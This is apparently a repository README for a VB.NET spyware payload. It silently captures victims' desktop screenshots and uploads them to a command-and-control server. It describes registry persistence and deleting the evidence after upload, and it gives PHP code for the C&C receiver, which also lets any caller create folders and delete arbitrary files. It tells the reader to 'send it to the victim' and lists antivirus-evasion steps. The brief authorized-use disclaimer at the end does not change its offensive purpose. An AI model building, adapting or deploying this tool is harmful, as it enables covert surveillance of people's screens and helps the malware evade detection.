Mr.Peter

Silent Screenshot Capture | Post Exploitation Payload | VB.NET

A simple payload to take the screenshot of victims desktop and upload it to the C&C.

• Persistent (Using Registry Run Key)
• Works in background
• Less Code Less Bugs and Less Detection ;)
• Deletes the screenshot from disk after upload it to C&C
• C&C server in base64
• Upload screenshots in organized way on C&C
• No port forwarding needed! works with a single php file
• [TODO] Machine Information
• [TODO] Encryption
• [TODO] Set interval remotely from C&C

• Clone this repository.
• A webhosting i recommend namecheap
• Goto your public_html folder and make new PHP file and put below code in it

<?php
$del = $_GET["dellog"];
$folder = $_GET["folder"];
mkdir($folder,0777);
$file = $_GET["path"];
if (!empty($_FILES["file"])){
move_uploaded_file($_FILES["file"]["tmp_name"],
      $file . "/" . $_FILES["file"]["name"]);
}
unlink($del);
?>

• Open the project in Visual Studio and the edit below variable in source code

Dim server As String = BaseDecode1("your server address here in base64 encoded") 

• and edit this variable below as well

Dim php As String = "yourphpfilename.php?" & "folder="

• Just compile it and send it to the victim thats all !!

To Avoid Antivirus Detection

• Change the app icon
• Generate new GUID
• Changes all the variables
• Obfuscate the code using Obfuscar
• Change the Assembly information

If this tool has been useful for you, feel free to thank me by buying me a coffee :)

This tool is supposed to be used only on authorized systems. Any unauthorized use of this tool without explicit permission is illegal.

GNU GENERAL PUBLIC LICENSE